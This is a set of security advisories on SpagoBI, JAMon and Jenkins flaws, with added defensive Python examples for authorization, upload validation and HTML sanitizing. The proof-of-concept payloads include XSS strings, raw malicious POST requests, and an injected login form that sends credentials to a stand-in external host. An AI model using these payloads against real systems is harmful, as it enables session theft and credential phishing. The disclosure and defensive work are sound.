[Full-disclosure] [CVE-2013-6231] Remote Privilege Escalation in SpagoBI v4.0
###
01. ### Advisory Information ###

Title: Remote Privilege Escalation in SpagoBI
Date published: 2014-02-28
Date of last update: 2014-02-28
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: High

02. ### Vulnerability Information ###

CVE reference: CVE-2013-6231
CVSS v2 Base Score: 9
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Component/s: SpagoBI
Class: Input Manipulation

03. ### Introduction ###

SpagoBI[1] is an Open Source Business Intelligence suite belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics.[3] SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4], managed by OW2 Consortium, an independent open-source software community.

[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi

04. ### Vulnerability Description ###

SpagoBI contains a flaw that leads to unauthorized privileges being gained. The issue is triggered when the servlet action AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION is invoked with specially crafted input, and it may allow a remote, authenticated attacker to gain the Administrator role.

05. ### Technical Description / Proof of Concept Code ###

An attacker (a malicious SpagoBI Business User holding the RSM role) can invoke the servlet action AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION directly by URL to gain SpagoBI Administrator privileges: the user-management page is reachable by any authenticated user, and it lets the caller edit the roles assigned to their own account.

To reproduce the vulnerability, follow the steps below:

- Using a browser, log on to SpagoBI with a restricted account (e.g. a Business User account)
- Open: https://localhost/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION
- Select your account from the Users List
- Select the Administrator role from the Roles tab and save

The remote privilege escalation attack is complete.

06. ### Business Impact ###

Successful exploitation of the vulnerability may allow a remote, authenticated attacker to elevate privileges and obtain full access to the affected system. The attacker could use the vulnerability to become administrator and retrieve or publish any kind of data.

07. ### Systems Affected ###

This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204

Fixed by vendor [verified]

09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy
ch(dot)catalano(at)gmail(dot)com

10. ### Vulnerability History ###

October 8th, 2013: Vulnerability identification
October 22nd, 2013: Vendor notification to [SpagoBI Team]
November 5th, 2013: Vendor response/feedback from [SpagoBI Team]
December 16th, 2013: Vendor fix/patch [SpagoBI Team]
January 16th, 2014: Fix/patch verified
February 28th, 2014: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

###

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
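The authorization failure behind the PoC above, as an added example in Python that is not SpagoBI code: a minimal action dispatcher in the 4.0 style, which only checks that a session exists, beside a hardened dispatcher that maps each action to the roles allowed to call it (deny by default) and refuses to let a caller edit their own role set. The action name MANAGE_USER_ACTION and the Administrator role come from the advisory; the Session and UserStore classes, the EXECUTE_DOCUMENT_ACTION action, the role constants and the user names are hypothetical stand-ins for the real servlet.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, Set

# ADMIN is the SpagoBI Administrator role named in the advisory; BUSINESS_USER
# stands in for the restricted account the PoC logs in with (names assumed).
ADMIN = "ADMIN"
BUSINESS_USER = "BUSINESS_USER"


class Forbidden(Exception):
    """Raised when a session is not permitted to run an action."""


@dataclass
class Session:
    user: str
    roles: Set[str]


@dataclass
class UserStore:
    """Hypothetical stand-in for the user/role table the action edits."""
    roles: Dict[str, Set[str]] = field(default_factory=dict)


def manage_user(session: Session, params: dict, store: UserStore) -> Set[str]:
    """Handler behind ACTION_NAME=MANAGE_USER_ACTION: replace a user's role set."""
    store.roles[params["user"]] = set(params["roles"])
    return store.roles[params["user"]]


def execute_document(session: Session, params: dict, store: UserStore) -> str:
    """Hypothetical low-privilege action, here to show the gate still lets ordinary work through."""
    return "ran %s for %s" % (params["doc"], session.user)


ACTIONS: Dict[str, Callable] = {
    "MANAGE_USER_ACTION": manage_user,
    "EXECUTE_DOCUMENT_ACTION": execute_document,
}


def dispatch_vulnerable(session, action, params, store):
    """The 4.0 behaviour the PoC relies on: any logged-in session may run any action."""
    if session is None:
        raise Forbidden("login required")
    return ACTIONS[action](session, params, store)


# Hardened dispatcher: an explicit map from action to the roles allowed to call
# it. An action missing from the map gets an empty set, i.e. nobody may run it.
ACTION_POLICY: Dict[str, Set[str]] = {
    "MANAGE_USER_ACTION": {ADMIN},
    "EXECUTE_DOCUMENT_ACTION": {ADMIN, BUSINESS_USER},
}


def dispatch_hardened(session, action, params, store):
    if session is None:
        raise Forbidden("login required")
    if not (session.roles & ACTION_POLICY.get(action, set())):
        raise Forbidden("%s may not run %s" % (session.user, action))
    # Nobody, administrators included, may change the roles of the account they
    # are logged in as; this closes the "select your own account" step of the
    # PoC for any role that is ever allowed onto the page.
    if action == "MANAGE_USER_ACTION" and params.get("user") == session.user:
        raise Forbidden("editing your own roles is not allowed")
    return ACTIONS[action](session, params, store)


def replay_poc(dispatch) -> Set[str]:
    """Replays the advisory's steps through `dispatch`; returns the attacker's roles afterwards."""
    store = UserStore(roles={"biadmin": {ADMIN}, "mallory": {BUSINESS_USER}})
    mallory = Session("mallory", set(store.roles["mallory"]))
    try:
        dispatch(mallory, "MANAGE_USER_ACTION",
                 {"user": "mallory", "roles": [BUSINESS_USER, ADMIN]}, store)
    except Forbidden:
        pass
    return store.roles["mallory"]


def admin_can_still_manage_others() -> Set[str]:
    """Sanity check that the hardened gate leaves legitimate administration working."""
    store = UserStore(roles={"biadmin": {ADMIN}, "alice": {BUSINESS_USER}})
    admin = Session("biadmin", {ADMIN})
    return dispatch_hardened(admin, "MANAGE_USER_ACTION",
                             {"user": "alice", "roles": [ADMIN]}, store)


if __name__ == "__main__":
    print("4.0-style dispatcher:", replay_poc(dispatch_vulnerable))
    print("hardened dispatcher: ", replay_poc(dispatch_hardened))
```

The point of the policy map is that it is consulted before any handler runs, so a new action that nobody remembered to add to it is unreachable rather than open to everyone; the self-edit rule is the second, independent check that would have stopped this PoC even if the page had been reachable.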
[Full-disclosure] [CVE-2013-6232] Persistent Cross-Site Scripting (XSS) in SpagoBI v4.0
###
01. ### Advisory Information ###

Title: Persistent Cross-Site Scripting (XSS) in SpagoBI
Date published: 2014-03-01
Date of last update: 2014-03-01
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: High

02. ### Vulnerability Information ###

CVE reference: CVE-2013-6232
CVSS v2 Base Score: 4
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Component/s: SpagoBI
Class: Input Manipulation

03. ### Introduction ###

SpagoBI[1] is an Open Source Business Intelligence suite belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics.[3] SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4], managed by OW2 Consortium, an independent open-source software community.

[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi

04. ### Vulnerability Description ###

SpagoBI contains a flaw that allows persistent cross-site scripting (XSS) attacks. The flaw exists because the application does not validate certain input (the document note, among others) before returning it to other users. This may allow an attacker to store a specially crafted note that executes arbitrary script code in a user's browser within the trust relationship between their browser and the server.

05. ### Technical Description / Proof of Concept Code ###

On the document execution page a toolbar with various icons lets the user perform actions related to the document run. One of them lets the user insert a note about the executed document; the note is associated with the document, with the parameter values of that run, and with the user. A note can be public or private: public notes are visible to all users, private notes only to their creator.

An attacker (a malicious SpagoBI user with a restricted account) can insert a note containing the following markup and save it as public:

<object data="javascript:alert('XSS')"></object>

The code executes when the victim (an unaware user) clicks on the document's note detail. This is not the only way to add malicious code to the SpagoBI web application.

06. ### Business Impact ###

Exploitation of the vulnerability requires a low-privileged application user account and low to medium user interaction. Successful exploitation results in session hijacking, client-side phishing, client-side external redirects or malware loads, and client-side manipulation of the vulnerable module context.

07. ### Systems Affected ###

This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204

Fixed by vendor [verified]

09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy
ch(dot)catalano(at)gmail(dot)com

10. ### Vulnerability History ###

October 8th, 2013: Vulnerability identification
October 22nd, 2013: Vendor notification to [SpagoBI Team]
November 5th, 2013: Vendor response/feedback from [SpagoBI Team]
December 16th, 2013: Vendor fix/patch [SpagoBI Team]
January 16th, 2014: Fix/patch verified
March 1st, 2014: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

###
[Full-disclosure] [CVE-2013-6233] Persistent HTML Script Insertion permits offsite-bound forms in SpagoBI v4.0
###
01. ### Advisory Information ###

Title: Persistent HTML Script Insertion permits offsite-bound forms
Date published: 2014-03-01
Date of last update: 2014-03-01
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: Medium

02. ### Vulnerability Information ###

CVE reference: CVE-2013-6233
CVSS v2 Base Score: 4
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Component/s: SpagoBI
Class: Input Manipulation

03. ### Introduction ###

SpagoBI[1] is an Open Source Business Intelligence suite belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics.[3] SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4], managed by OW2 Consortium, an independent open-source software community.

[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi

04. ### Vulnerability Description ###

SpagoBI contains a flaw that allows persistent script insertion. A remote attacker can inject HTML, including forms whose action points at a remote site, which lets the attacker conduct a phishing attack against other users and capture their credentials.

05. ### Technical Description / Proof of Concept Code ###

The vulnerability is located in several SpagoBI input fields (e.g. the 'Description' field of 'Short document metadata').

To reproduce the vulnerability, the attacker (a malicious user) enters the following HTML in the 'Description' field of 'Short document metadata' and clicks the save button:

<form method="POST" action="http://www.mocksite.org/login/login.php">
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center"><p><input type="submit" value="Login" /></p></div>
</form>

The injected form is rendered when the victim (an unaware user) opens 'Short document metadata'; credentials typed into it are sent to the attacker's site. This is not the only way to inject malicious HTML code into the SpagoBI web application.

06. ### Business Impact ###

Exploitation of the vulnerability requires a low-privileged application user account and low to medium user interaction. Successful exploitation results in persistent phishing and persistent external redirects.

07. ### Systems Affected ###

This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204

Fixed by vendor [verified]

09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy
ch(dot)catalano(at)gmail(dot)com

10. ### Vulnerability History ###

October 8th, 2013: Vulnerability identification
October 22nd, 2013: Vendor notification to [SpagoBI Team]
November 5th, 2013: Vendor response/feedback from [SpagoBI Team]
December 16th, 2013: Vendor fix/patch [SpagoBI Team]
January 16th, 2014: Fix/patch verified
March 1st, 2014: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

###
[Full-disclosure] [CVE-2013-6234] XSS File Upload in SpagoBI v4.0
###
01. ### Advisory Information ###

Title: XSS File Upload
Date published: 2014-03-01
Date of last update: 2014-03-01
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: Medium

02. ### Vulnerability Information ###

CVE reference: CVE-2013-6234
CVSS v2 Base Score: 4
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Component/s: SpagoBI
Class: Input Manipulation

03. ### Introduction ###

SpagoBI[1] is an Open Source Business Intelligence suite belonging to the free/open source SpagoWorld initiative, founded and supported by Engineering Group[2]. It offers a large range of analytical functions, a highly functional semantic layer often absent in other open source platforms and projects, and a respectable set of advanced data visualization features including geospatial analytics.[3] SpagoBI is released under the Mozilla Public License, allowing its commercial use. SpagoBI is hosted on OW2 Forge[4], managed by OW2 Consortium, an independent open-source software community.

[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] - http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi

04. ### Vulnerability Description ###

SpagoBI contains a flaw that may allow a remote attacker to store and serve arbitrary content from the application. The flaw exists because the application does not restrict the file types accepted by the Worksheet designer's image upload. A remote attacker can upload arbitrary files (e.g. an .html file for XSS) that execute arbitrary script code in a user's browser within the trust relationship between their browser and the server, or use the upload as a foothold for more serious attacks.

05. ### Technical Description / Proof of Concept Code ###

An attacker (a malicious SpagoBI user with a restricted account) can upload a file through the Worksheet designer function.

To reproduce the vulnerability, follow the steps below:

- Using a browser, log on to SpagoBI with a restricted account (e.g. a Business User account)
- Go to the Worksheet designer function
- Click on Image, then Choose image
- Upload the malicious file and save

The XSS malicious file upload attack is complete.

More details about the SpagoBI Worksheet Engine and Worksheet designer:
http://wiki.spagobi.org/xwiki/bin/view/spagobi_server/Worksheet#HWorksheetoverview

Malicious file (e.g. xss.html):

<!DOCTYPE html>
<html>
<head>
<script>
function myFunction() { alert('XSS'); }
</script>
</head>
<body>
<input type="button" onclick="myFunction()" value="Show alert box">
</body>
</html>

06. ### Business Impact ###

Exploitation of the vulnerability requires a low-privileged application user account and low to medium user interaction. Successful exploitation results in session hijacking, client-side phishing, client-side external redirects or malware loads, and client-side manipulation of the vulnerable module context.

07. ### Systems Affected ###

This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204

Fixed by vendor [verified]

09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy
ch(dot)catalano(at)gmail(dot)com

10. ### Vulnerability History ###

October 9th, 2013: Vulnerability identification
October 22nd, 2013: Vendor notification to [SpagoBI Team]
November 5th, 2013: Vendor response/feedback from [SpagoBI Team]
December 16th, 2013: Vendor fix/patch [SpagoBI Team]
January 16th, 2014: Fix/patch verified
March 1st, 2014: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

###
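A content-based check for an image upload slot such as the Worksheet designer's, as an added example in Python that is not SpagoBI code. It accepts a file only if its bytes carry a PNG, JPEG or GIF signature, rejects anything that also contains HTML tokens (a GIF/HTML polyglot), and shows the headers a stored upload should be served with so a browser cannot reinterpret it as a page. The function names, the accepted formats, the size limit and the sample files are assumptions; the xss.html payload mirrors the advisory's.

```python
import os
import re
from typing import Dict

# Magic bytes of the formats an image slot should accept. SVG is left out on
# purpose: it is an image type, but it can carry <script>.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
MAX_BYTES = 2 * 1024 * 1024  # assumed limit; the advisory names none

# Markup tokens that have no business inside an image. A file that starts with
# a valid GIF header and then contains <script> is a polyglot that a browser
# may still render as HTML if it is ever served without a proper Content-Type.
MARKUP_TOKEN = re.compile(
    rb"<\s*/?\s*(?:!doctype|html|head|body|script|svg|object|embed|iframe|meta)\b", re.I)


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_image_upload(filename: str, data: bytes) -> str:
    """Return the MIME type to store with the file, or raise UploadRejected.

    Every check is on the bytes or on a server-side allowlist; nothing here
    trusts the client-supplied Content-Type or the name beyond its extension.
    """
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension %r not allowed" % ext)
    if not data:
        raise UploadRejected("empty file")
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    mime = None
    for signature, candidate in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            mime = candidate
            break
    if mime is None:
        raise UploadRejected("content is not PNG, JPEG or GIF")
    if MARKUP_TOKEN.search(data):
        raise UploadRejected("image contains markup (possible HTML polyglot)")
    return mime


def is_accepted(filename: str, data: bytes) -> bool:
    """Boolean wrapper around validate_image_upload, convenient for tests and logging."""
    try:
        validate_image_upload(filename, data)
        return True
    except UploadRejected:
        return False


def download_headers(mime: str, stored_name: str) -> Dict[str, str]:
    """Headers to serve a stored upload with so the browser cannot reinterpret it.

    stored_name is meant to be a server-generated name, not the uploader's;
    it is normalised anyway before going into the header.
    """
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", stored_name)
    return {
        "Content-Type": mime,                      # the validated type, never the client's
        "X-Content-Type-Options": "nosniff",       # no MIME sniffing of the body
        "Content-Disposition": 'inline; filename="%s"' % safe_name,
        # Even if something slipped through as HTML: no script, no network, no origin.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample inputs: a minimal PNG header and the advisory's xss.html.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SAMPLE_XSS_HTML = (b"<!DOCTYPE html><html><head><script>function myFunction()"
                   b"{alert('XSS');}</script></head><body></body></html>")

if __name__ == "__main__":
    print("logo.png accepted:", is_accepted("logo.png", SAMPLE_PNG))
    print("xss.html accepted:", is_accepted("xss.html", SAMPLE_XSS_HTML))
```

Serving user uploads from a separate origin (a dedicated host for static content) is the stronger fix, since it takes the application's cookies and DOM out of reach of whatever the file turns out to be; the headers above are the minimum for the case where that is not possible.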
[Full-disclosure] [CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7
###
01. ### Advisory Information ###

Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2014-01-23
Date of last update: 2014-01-23
Vendors contacted: JAMon
Discovered by: Christian Catalano
Severity: Low

02. ### Vulnerability Information ###

CVE reference: CVE-2013-6235
CVSS v2 Base Score: 4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v2.7
Class: Input Manipulation

03. ### Introduction ###

The Java Application Monitor (JAMon) is a free, simple, high-performance, thread-safe Java API that allows developers to easily monitor production applications.
http://jamonapi.sourceforge.net

04. ### Vulnerability Description ###

Multiple non-persistent cross-site scripting vulnerabilities have been identified in the JAMon web application. JAMon contains a flaw that allows multiple reflected cross-site scripting (XSS) attacks. This flaw exists because certain pages do not validate input before returning it to users.

+-------------------+-------------------+
| Vulnerable module | Parameter         |
+-------------------+-------------------+
| mondetail.jsp     | ArraySQL          |
| mondetail.jsp     | listenertype      |
| mondetail.jsp     | currentlistener   |
| jamonadmin.jsp    | ArraySQL          |
| sql.jsp           | ArraySQL          |
| exceptions.jsp    | ArraySQL          |
+-------------------+-------------------+

05. ### Technical Description / Proof of Concept Code ###

05.01) Malicious request (ArraySQL parameter)

The vulnerability is located in the 'Filter (optional)' input field upon submission to the pages:

http://localhost/jamon/mondetail.jsp
http://localhost/jamon/jamonadmin.jsp
http://localhost/jamon/sql.jsp
http://localhost/jamon/exceptions.jsp

The application does not validate the 'ArraySQL' parameter upon submission to these JSP pages. The attacker can enter the malicious JavaScript code:

1--1<ScRiPt>alert('XSS')</ScRiPt><!--

in the 'Filter (optional)' input field and click on the GO! button.

05.02) Malicious request (listenertype parameter)

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209

listenertype=1--1<ScRiPt>alert('XSS')</ScRiPt><!--&currentlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21

05.03) Malicious request (currentlistener parameter)

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

listenertype=value&currentlistener=1--1<ScRiPt>alert('XSS')</ScRiPt><!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21

06. ### Business Impact ###

This may allow an attacker to create a specially crafted request that executes arbitrary script code in a user's browser within the trust relationship between their browser and the server.

07. ### Systems Affected ###

This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

Currently, there are no known upgrades or patches to correct this vulnerability.

09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy
ch(dot)catalano(at)gmail(dot)com

10. ### Vulnerability History ###

October 18th, 2013: Vulnerability identification
October 22nd, 2013: Vendor notification [JAMon]
December 10th, 2013: Vulnerability confirmation [JAMon]
January 23rd, 2014: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

###
[Full-disclosure] [CVE-2013-5573] Jenkins v1.523 Default markup formatter permits offsite-bound forms
###
01. ### Advisory Information ###

Title: Default markup formatter permits offsite-bound forms
Date published: 2013-12-16
Date of last update: 2013-12-16
Vendors contacted: Jenkins CI
Discovered by: Christian Catalano
Severity: Low

02. ### Vulnerability Information ###

CVE reference: CVE-2013-5573
CVSS v2 Base Score: 4.7
CVSS v2 Vector: (AV:N/AC:L/Au:M/C:P/I:P/A:N)
Component/s: Jenkins CI v1.523
Class: HTML Injection

03. ### Introduction ###

Jenkins CI is an extendable open source continuous integration server: http://jenkins-ci.org

04. ### Vulnerability Description ###

The default installation and configuration of Jenkins CI is prone to a security vulnerability: the default markup formatter permits offsite-bound forms. A remote attacker (a malicious user) can exploit this to inject persistent HTML code on the application side.

05. ### Technical Description / Proof of Concept Code ###

The vulnerability is located in the 'Description' input field of the User Configuration function:
https://localhost:9444/jenkins/user/attacker/configure

To reproduce the vulnerability, the attacker (a malicious user) enters the following HTML in the 'Description' field and clicks the save button:

<form method="POST" action="http://www.mocksite.org/login/login.php">
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center"><p><input type="submit" value="Login" /></p></div>
</form>

The injected form is rendered when the victim (an unaware user) views the 'People' list, https://localhost:9444/jenkins/asynchPeople/, and clicks on the attacker's user id.

06. ### Business Impact ###

Exploitation of the persistent web vulnerability requires a low-privileged web application user account. Successful exploitation results in persistent phishing and persistent external redirects.

07. ### Systems Affected ###

This vulnerability was tested against: Jenkins CI v1.523
Older versions are probably affected too, but they were not checked.

08. ### Vendor Information, Solutions and Workarounds ###

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily mitigate the flaw by implementing the following workaround.

The formatter's 'MyspacePolicy' permits:

tag(form, action, ONSITE_OR_OFFSITE_URL, method);

Fix 'MyspacePolicy' by restricting the action attribute to ONSITE_URL only, or ban the form element entirely.

09. ### Credits ###

This vulnerability has been discovered by:
Christian Catalano aka wastasy
ch(dot)catalano(at)gmail(dot)com

10. ### Vulnerability History ###

August 21st, 2013: Vulnerability identification
August 4th, 2013: Vendor notification [Jenkins CI]
November 19th, 2013: Vulnerability confirmation [Jenkins CI]
November 19th, 2013: Vendor solution
December 16th, 2013: Vulnerability disclosure

11. ### Disclaimer ###

The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

###
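The ONSITE_URL restriction proposed above, worked through as an added example in Python that is not Jenkins, OWASP sanitizer or SpagoBI code. One allowlist sanitizer covers the four stored-markup advisories on this page: a form whose action is not on-site is removed together with its inputs (the fix suggested here), while allow_offsite_forms=True reproduces the permissive policy the advisory describes; object and script elements are removed with their content, and javascript: URLs are dropped from attributes, which covers the SpagoBI note payload (CVE-2013-6232) and metadata form (CVE-2013-6233). The separate escape_plain_text function is the right tool for fields that are not rich text at all, such as the JAMon filter parameters. The element and attribute allowlists, the on-site test (no scheme and no host, a simplification of the ONSITE_URL/OFFSITE_URL patterns) and the sample payloads are assumptions.

```python
import html
import re
from html.parser import HTMLParser
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

# Elements a rich-text field may keep. Anything else loses its tag (text kept)
# or, for DROP_WITH_CONTENT elements, is removed together with its content.
ALLOWED_TAGS: Set[str] = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li",
                          "div", "span", "pre", "code", "blockquote", "a", "form", "input"}
DROP_WITH_CONTENT: Set[str] = {"script", "style", "object", "embed", "iframe", "applet", "noscript"}
VOID_TAGS: Set[str] = {"br", "input"}
ALLOWED_ATTRS: Dict[str, Set[str]] = {
    "a": {"href", "title"}, "form": {"action", "method"},
    "input": {"type", "name", "value", "size"}, "div": {"align"},
}
URL_ATTRS: Set[Tuple[str, str]] = {("a", "href"), ("form", "action")}
_URL_NOISE = re.compile(r"[\x00-\x20]")   # browsers ignore these inside "java\tscript:"


def url_is_onsite(value: str) -> bool:
    """True for path, query or fragment URLs: no scheme and no host."""
    parts = urlsplit(_URL_NOISE.sub("", value))
    return not parts.scheme and not parts.netloc


def url_is_safe(value: str) -> bool:
    """Rejects javascript:, data:, vbscript: and friends; allows on-site and http(s) URLs."""
    parts = urlsplit(_URL_NOISE.sub("", value))
    return not parts.scheme or parts.scheme.lower() in ("http", "https")


class AllowlistSanitizer(HTMLParser):
    def __init__(self, allow_offsite_forms: bool) -> None:
        super().__init__(convert_charrefs=True)
        self.allow_offsite_forms = allow_offsite_forms
        self.out: List[str] = []
        self.open_tags: List[str] = []   # emitted elements still open, for balanced output
        self.skip_tag, self.skip_depth = "", 0   # element currently being removed with content
        self.dropped: List[str] = []     # what was removed, for logging or tests

    def _skip(self, tag: str) -> None:
        self.skip_tag, self.skip_depth = tag, 1
        self.dropped.append(tag)

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            self.skip_depth += tag == self.skip_tag
            return
        if tag in DROP_WITH_CONTENT:
            return self._skip(tag)
        if tag not in ALLOWED_TAGS:
            return self.dropped.append(tag)
        kept = []
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if (tag, name) in URL_ATTRS:
                if not url_is_safe(value):
                    self.dropped.append("%s[%s]" % (tag, name))
                    continue
                if tag == "form" and not self.allow_offsite_forms and not url_is_onsite(value):
                    return self._skip(tag)   # offsite-bound form: remove it and its inputs
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        if tag in VOID_TAGS:
            self.out.append("<%s%s />" % (tag, "".join(kept)))
        else:
            self.out.append("<%s%s>" % (tag, "".join(kept)))
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            self.skip_depth -= tag == self.skip_tag
        elif tag in self.open_tags:
            while True:                  # close mis-nested children first
                top = self.open_tags.pop()
                self.out.append("</%s>" % top)
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_rich_text(fragment: str, allow_offsite_forms: bool = False) -> str:
    """Allowlist-sanitize user HTML; allow_offsite_forms=True mimics the permissive policy."""
    parser = AllowlistSanitizer(allow_offsite_forms)
    parser.feed(fragment)
    return parser.result()


def escape_plain_text(value: str) -> str:
    """For parameters that are not rich text (the JAMon filter): encode everything."""
    return html.escape(value, quote=True)


# Constructed sample payloads, mirroring the advisories on this page.
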